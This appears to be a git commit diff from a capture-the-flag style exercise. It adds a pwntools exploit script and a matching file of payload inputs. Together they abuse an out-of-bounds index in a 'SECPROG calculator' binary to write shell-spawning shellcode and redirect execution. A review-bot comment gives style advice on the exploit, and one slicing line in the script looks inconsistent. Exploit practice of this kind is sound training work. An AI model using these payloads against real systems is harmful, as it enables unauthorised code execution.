-rwxr-xr-xbruh.py5
-rw-r--r--calc.i64bin8368587 -> 8368587 bytes
-rw-r--r--corebin0 -> 983040 bytes
-rwxr-xr-xexploit.py26
-rw-r--r--sout1
-rw-r--r--stest16
6 files changed, 41 insertions, 7 deletions
diff --git a/bruh.py b/bruh.py
deleted file mode 100755
index ca71230..0000000
--- a/bruh.py
+++ /dev/null
@@ -1,5 +0,0 @@
-#!/usr/bin/env python3
-for x in range(147460):
- print("99", end='')
-print("")
-
diff --git a/calc.i64 b/calc.i64
index f0ede19..e56120b 100644
--- a/calc.i64
+++ b/calc.i64
Binary files differ
diff --git a/core b/core
new file mode 100644
index 0000000..daf8a1f
--- /dev/null
+++ b/core
Binary files differ
diff --git a/exploit.py b/exploit.py
new file mode 100755
index 0000000..b765e85
--- /dev/null
+++ b/exploit.py
@@ -0,0 +1,26 @@
+#!/usr/bin/env python3
+from pwn import *
+
+
+context.binary = './calc'
+
+shellcode = asm(shellcraft.sh())
+
+pid = process("./calc")
+
+print(shellcode.hex())
+print(context)
+
+shellen = len(shellcode)
+
+for exec_num,offset in enumerate(reversed(range(361, int(len(shellcode) / 4) + 361))):
+ pid.sendline("+{}+{}".format(offset, int.from_bytes(shellcode[((exec_num + 1) * 1):(exec_num * 4)], 'big')))
+ print("+{}+{}".format(offset, int.from_bytes(shellcode[shellen - ((exec_num + 1) * 4):shellen - (exec_num * 4)], 'big')))
+
+
+pid.sendline("+360+135151459")
+print("+360+135151459")
+#pid.interactive()
+
+print(pid.recv())
+
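Review bot: The wildcard `from pwn import *` at the top of exploit.py hides which names the script takes from pwntools; importing them by name, `from pwn import asm, context, process, shellcraft`, keeps the dependency surface visible. The variable `pid` holds the object returned by `process("./calc")`, not a process id, so a name such as `proc` would read more accurately. The constants `360`, `361` and `135151459` carry no explanation; a one-line comment on each saying what it refers to and how it was derived (presumably from the `calc.i64` analysis changed in the same commit) would let a reader check them against the binary. Both `sendline` calls are given `str` values, so passing bytes, e.g. `"...".format(...).encode()`, makes the wire encoding explicit.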
diff --git a/sout b/sout
new file mode 100644
index 0000000..1b4930b
--- /dev/null
+++ b/sout
@@ -0,0 +1 @@
+=== Welcome to SECPROG calculator ===
diff --git a/stest b/stest
index 9b7062f..2d26487 100644
--- a/stest
+++ b/stest
@@ -1,2 +1,14 @@
--7+1234
--8+134517012
++371+795371626
++370+1752379183
++369+1852400175
++368+23651209
++367+2164326657
++366+1769088052
++365+3375431937
++364+1493461585
++363+2303844609
++362+1792160225
++361+2160941067
++360+135151459
+bruh
+